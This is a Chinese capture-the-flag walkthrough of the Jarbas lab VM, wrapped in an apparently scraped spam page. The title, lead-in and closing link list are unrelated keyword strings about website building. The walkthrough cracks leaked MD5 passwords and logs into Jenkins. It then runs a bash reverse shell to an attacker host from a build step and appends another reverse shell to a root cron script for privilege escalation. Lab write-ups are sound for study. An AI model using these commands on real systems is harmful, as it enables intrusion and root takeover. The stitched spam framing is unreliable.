当前位置: 首页 > news >正文

上海做机床的公司网站怎么建网站

上海做机床的公司网站,怎么建网站,复制Wordpress网站,腾讯云域名申请文章目录 信息收集主机发现端口扫描目录爆破 漏洞探测whatwebhash-identifierwhatweb 文档说明:https://www.vulnhub.com/entry/jarbas-1,232/ 靶机下载:Download (Mirror): 信息收集 主机发现 扫描C段 sudo nmap -sn 10.9.75.0/24端口扫描 sudo nma…

文章目录

    • 信息收集
      • 主机发现
      • 端口扫描
      • 目录爆破
    • 漏洞探测
      • whatweb
      • hash-identifier
      • whatweb

文档说明:https://www.vulnhub.com/entry/jarbas-1,232/

靶机下载:Download (Mirror):

信息收集

主机发现

扫描C段

sudo nmap -sn 10.9.75.0/24

image-20231125131716854

端口扫描

sudo nmap --min-rate 10000 10.9.75.10

image-20231125131847664

详细扫描服务版本,系统

sudo nmap -sT -sV -O -p 22,80,3306,8080 10.9.75.10 

image-20231125132007149

目录爆破

dirsearch -u http://10.9.75.10 -i 200  

image-20231125132323184

漏洞探测

whatweb

访问80端口

image-20231125132425330

whatweb http://10.9.75.10

image-20231125133245051

并没有识别到类似的CMS内容管理系统,

继续访问access.html发现了类似用户名:加密后的密码的东西

image-20231125132945210

hash-identifier

可以使用工具来验证加密类型

hash-identifier "5978a63b4654c73c60fa24f836386d87"  

image-20231125133052923

拿去在线网站进行md5解密

image-20231125133516690

image-20231125133605822

image-20231125133636880

tiago:italia99

trindade:marianna

eder:vipsu

访问8080端口

image-20231125134737788

whatweb

whatweb http://10.9.75.10:8080

image-20231125134830353

指纹识别出一个Jenkins的CMS管理系统

尝试使用上面解密出来的密码进行登陆

使用eder:vipsu登陆成功!

image-20231125135041152

image-20231125135104467

新建一个任务

image-20231125135842524

选择第一个自由风格软件项目就可以,然后往下翻,点击确定

点击Build构建

image-20231125135948173

由于目标系统是linux系统,所以选择第二个execute shell

/bin/bash >& /dev/tcp/10.9.75.3/6868 0>&1#反弹到kali上

点击应用,然后点击保存

image-20231125140121483

这个时候kali先监听6868端口

nc  -lvvp 6868  

回到页面上点击立即构建

image-20231125140412821

就反弹到kali机器上了

image-20231125140529852

页面上会显示有一个任务正在运行

image-20231125140547563

我们拿到shell是没有回显的,可以通过python获取显示shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20231125140911530

最后再计划任务里找到了以root运行 的程序

image-20231125141047389

查看文件内容

cat /etc/script/CleaningScript.sh

image-20231125141328159

可以在里面添加反弹shell,

echo "/bin/bash >& /dev/tcp/10.9.75.3/6869 0>&1" >> /etc/script/CleaningScript.sh

image-20231125141432284

kali监听6869端口,等待反弹

image-20231125141555084

Jenkins 的漏洞利用方式有很多,可以自行去网上查阅相关资料

http://www.wangmingla.cn/news/165081.html

相关文章:

  • 网站空间需要多大十大经典营销案例
  • 网站建设和网站编辑是什么工作优化大师win10能用吗
  • 平面设计网站排行榜前十名有哪些seo线上培训多少钱
  • 网站的劣势关键词异地排名查询
  • 手机下载视频网站模板下载seo实战密码第四版
  • wordpress去谷歌插件seo成功案例分析
  • 微信官方网站公众平台快速关键词排名首页
  • 洛阳网站建站青岛网站seo诊断
  • 安装网站提示dir最新seo教程
  • 西安做网站选哪家武汉seo服务外包
  • 外贸网站如何seo东莞疫情最新情况
  • 如何开网店具体步骤做seo推广公司
  • html5 网站建设苏州百度代理公司
  • 可以直接做室内su的网站seo入门教程seo入门
  • 企业网站系统功能设计说明搜索引擎排行榜前十名
  • 支付公司网站制作费怎么做分录推广方案
  • 校园网站建设意义今日头条新闻最新疫情
  • 公司网站的url网站建设与管理属于什么专业
  • 杭州做肉松饼的网站有多少家关键词首页排名优化平台
  • 景安 怎么把网站做别名怎么样做推广最有效
  • 网站地图什么意思专业网站推广优化
  • 建设企业网站的需要多长时间网页设计规范
  • 企业手机网站建设需要注意哪些今日微博热搜榜前十名
  • 广州商城建站系统百度文库个人登录入口
  • 源代码开发网站百度网页广告怎么做
  • 福州网站建设方案网站大全软件下载
  • 男女做污视频在线观看网站网络营销平台有哪些?
  • 做电商一般月入多少钱广州网站优化公司排名
  • wordpress作者关注功能怎么实现株洲seo推广
  • 手机怎么自己做网站免费职业技能培训网站